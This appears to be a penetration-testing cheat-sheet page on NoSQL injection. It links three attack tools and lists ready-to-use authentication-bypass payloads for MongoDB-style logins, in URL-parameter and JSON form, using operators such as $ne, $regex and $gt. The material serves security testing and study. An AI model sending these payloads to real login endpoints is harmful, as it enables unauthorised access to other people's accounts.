NoSQL injection

Tools

- NoSQL-Attack-Suite

https://github.com/C4l1b4n/NoSQL-Attack-Suite

- Nosql-MongoDB-injection-username-password-enumeration

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

- NoSQLi Scanner Burp Addon

https://portswigger.net/bappstore/605a859f0a814f0cbbdce92bc64233b4

Authentication bypass

Mus be tested manually since NoSQL Injections requires to change the parameters value.

In URL:

username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

In JSON:

{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
PreviousSQL InjectionNextLDAP Injection

Last updated